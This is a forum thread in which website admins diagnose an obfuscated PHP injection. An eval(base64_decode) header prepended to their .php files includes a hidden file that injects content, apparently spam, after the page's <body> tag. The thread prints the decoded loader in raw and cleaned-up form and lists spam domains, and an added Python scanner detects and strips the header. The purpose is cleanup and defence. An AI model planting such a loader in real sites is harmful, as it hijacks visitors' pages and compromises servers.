Is this a hack?

Started by Xavi-Nena, February 07, 2009, 10:16:55 PM

Xavi-Nena

I have code at the top of some of my files. I'm guessing this is a hack?

<? /**/eval(base64_decode('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')); ?>

Xavi-Nena

Never mind, sorry, I figured out that it was.

MrMike

Yep, it decodes to this...and it contains more obfuscated strings. It's a hack.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B& 8) {$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Xavi-Nena

Any idea how to figure out how this is happening?

MrMike

It looks like they put the file "copper.php" on the site and are calling it through an include:

home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php

There's a lot of GZ-encoded stuff to further hide the programming statements. It could be almost anything: a malware dropper, an extra ad displayer, a backdoor, a botnet includer file, etc.

Xavi-Nena

Ugh, thanks...

Let's hope it stops, considering I do not even have that file in my themes directory anymore...

MrMike

Quote from: NenaGb on February 08, 2009, 12:18:12 AM
> Ugh, thanks...
>
> Let's hope it stops, considering I do not even have that file in my themes directory anymore...

More importantly, you want to find out how your site was compromised initially or it'll probably be exploited again. They may also have installed additional code on your site that you'll want to find.

If you're running on a Linux box, this command will list the newest files anywhere on the system: ls -a -l -t -R | more

Xavi-Nena

I'm not sure exactly if I am or not, or how to run that code... Would you mind explaining? Thanks so much.

Fustrate

I got bored... doubt it'll be very helpful without the copper.php file, but here it is all cleaned up.

if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])){
    $GLOBALS['sh_no'] = 1;

    if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){
        include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');

        if(function_exists('gml') && !function_exists('dgobh')){
            if(!function_exists('gzdecode')){
                function gzdecode($var1){
                    $var2 = ord(substr($var1, 3, 1));
                    $var3 = 10;
                    $var4 = 0;

                    if($var2&4){
                        $var4 = unpack('v',substr($var1, 10, 2));
                        $var4 = $var4[1];
                        $var3 += 2 + $var4;
                    }

                    if($var2&8)
                        $var3 = strpos($var1, chr(0), $var3) + 1;

                    if($var2&16)
                        $var3 = strpos($var1, chr(0), $var3) + 1;

                    if($var2&2)
                        $var3 += 2;

                    $var5 = gzinflate(substr($var1, $var3));

                    if($var5 === FALSE)
                        $var5 = $var1;

                    return $var5;
                }
            }

            function dgobh($var6){
                Header('Content-Encoding: none');
                $var7 = gzdecode($var6);
                if(preg_match('/<body/si', $var7))
                    return preg_replace('/(<body[^>]*>)/si', '$1' . gml(), $var7);
                else
                    return gml() . $var7;
            }

            ob_start('dgobh');
        }
    }
}
Steven Hoffman
Former Team Member, 2009-2012

Xavi-Nena

Forgive my ignorance, but what exactly is this cleaned up?  O:)

aldo

We would need to see copper.php in order to know what it does.

Fustrate

Well, it's that big chunk of code from MrMike's post, with the really long variables replaced with $var1 - $var7, and put in a form that's actually legible.

The only thing I can discern from it is that it adds whatever gml() does right after the <body> tag. Without copper.php, we don't know what gml() puts in there.
Steven Hoffman
Former Team Member, 2009-2012

Totosfo

Hi all,

I had the same issue - the code was added to ALL .php files on my server. If anyone is interested in the copper.php file, I can provide it, just let me know where to mail it.

Best,

Thomas
Cheers,

Thomas

Fustrate

Steven Hoffman
Former Team Member, 2009-2012

cafecommk

Can someone tell me how you resolved this issue? I do not have a copper.php file, but I have this:
/**/eval(base64_decode('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'));
and it is in all my PHP files, even in settings_bak.

I apologize for writing in two posts: http://www.simplemachines.org/community/index.php?topic=291664.msg1931245#msg1931245

Thank you.

Fustrate

You'd probably have to remove it manually from every file, or use a large upgrade like [n3rve] said in the other thread.

And there was no file at /home/vistinac/public_html/cafe/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts/copper.php? I still haven't been able to find a copy of it to see what this does, but since you said it's not there, we still don't quite know what this does.
Steven Hoffman
Former Team Member, 2009-2012

cafecommk

Sorry, I did not find a copper.php. I removed all the files not needed, and [n3rve] helped with the large upgrade and ....
I just hope it does not cause me any more trouble.

ccondrup

I have recently had my SMF 1.1.8 board hacked. I have recently seen an increase in automatically registered accounts, and a couple of automated spam posts, so I have been monitoring a little closer lately. When suddenly lots of avatars went missing, I knew something was up.

All .php files under /www/ had this line injected at the top of the file:
<?php /**/eval(base64_decode('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')); ?>
No files with other file extensions were touched, and .php files outside of /www/ were also unharmed.

The above base64 hash decodes to what is in the attached decoded_injection.php
It in turn calls the main hack file, in my case called style.css.php - in my case this was placed in a subdirectory of an outdated phpmyadmin-install, quite possibly their point of entry for the exploit. I guess this file can be named copper.php or whatever in other circumstances.

This style.css.php file was a 170kb file with a huge base64 hash. It decoded to approx 20 new base64 encoded evals. I decoded everything I found and ran it through a code prettifier, and ended up with a 100kb php file of approx 2000 lines of code. I did a search+replace for some of the function names, but quickly tired and stopped halfway through - the file is just so massive.

Also, if your site is infected, take note of which folder that last mentioned file is in, because in the same folder is where it stores the generated spam files this hack creates. They are files without extensions, names ranging from just "t", "50", to longer names such as "f2219f70f695539a82941423841dc26c". I have attached 3 examples of those final spam files this hack aims to generate.

You can search the style.css.php file for "http:" to quickly find the involved spam domains, which include:
   nomsat23.net nssat3.com wplsat23.net pearch.net gawab.com
After googling gawab.com and the other mentioned callback-urls, I found several domains common forum admins have had trouble with, so I am creating an sql file to add all these domains to my smf bantriggers. It's also attached as spamdomains.sql - remember to replace 15 with the id of the bangroup you want to add these to.

Hope this helps someone. If anyone cares to dig deeper into the code, please update the thread with whatever you find.
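
A defensive scanner for the injection described in the posts above, added here as an example and not part of any post in this thread: it finds .php files that begin with the `/**/eval(base64_decode('...'))` header, decodes the string without executing it to list the files the loader includes (copper.php, style.css.php and the like), and can strip the header. The function names and the sample path are assumptions made for the illustration.

```python
import base64
import re
import sys
from pathlib import Path

# Header shape quoted in this thread: <? or <?php, then /**/eval(base64_decode('...')); ?>
INJECTED = re.compile(
    rb"<\?(?:php)?\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>\s*")
# File paths the decoded loader pulls in, e.g. include_once('/.../copper.php')
INCLUDE = re.compile(rb"include_once\('([^']+)'\)")


def inspect(data):
    """Return (payload, included_paths, cleaned_bytes), or None if no header is present."""
    m = INJECTED.match(data)  # the header sits at the very top of the file
    if m is None:
        return None
    try:  # decode only; the payload is searched as bytes and never executed
        payload = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # header shape matched, but the string is not valid base64
        payload = b""
    paths = sorted({p.decode("utf-8", "replace") for p in INCLUDE.findall(payload)})
    return payload, paths, data[m.end():]


def scan(root, fix=False):
    """Map each infected .php file under root to the paths its loader includes.

    With fix=True the header is stripped in place; the rest of the file is untouched.
    """
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hit = inspect(path.read_bytes()) if path.is_file() else None
        if hit is None:
            continue
        report[str(path)] = hit[1]
        if fix:
            path.write_bytes(hit[2])
    return report


if __name__ == "__main__":
    # Constructed sample: a harmless loader with a placeholder path.
    loader = b"if(file_exists('/srv/example/copper.php')){include_once('/srv/example/copper.php');}"
    sample = b"<?php /**/eval(base64_decode('" + base64.b64encode(loader) + b"')); ?><?php echo 1; ?>"
    print(inspect(sample)[1])
    # Report-only scan of a directory given on the command line.
    for name, paths in (scan(sys.argv[1]).items() if len(sys.argv) > 1 else ()):
        print(name, "->", ", ".join(paths) or "(no include found)")
```

Run it against a copy of the site first and keep a backup outside the web root. Stripping the header does not remove the included loader file or close the original point of entry.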

busterone

That looks really familiar.  Did you, or do you have a member named Krisbarteo?

If so, you may want to look at this thread-
http://www.simplemachines.org/community/index.php?topic=307717.msg2047539#msg2047539

ccondrup

Wouldn't you know it, I came directly to this thread via a search for the base64 hash in all the files. After I had posted, I looked at the other threads in the forum, so I found out how common this issue was ;)

I have already read the one you linked, and now all my bantriggers are removed and this mod has been installed. Yes, Krisbarteo was present, and a few other suspicious members from same host/ip. So far it has found ~10 registered members that are confirmed spammers. Already love the mod ;)
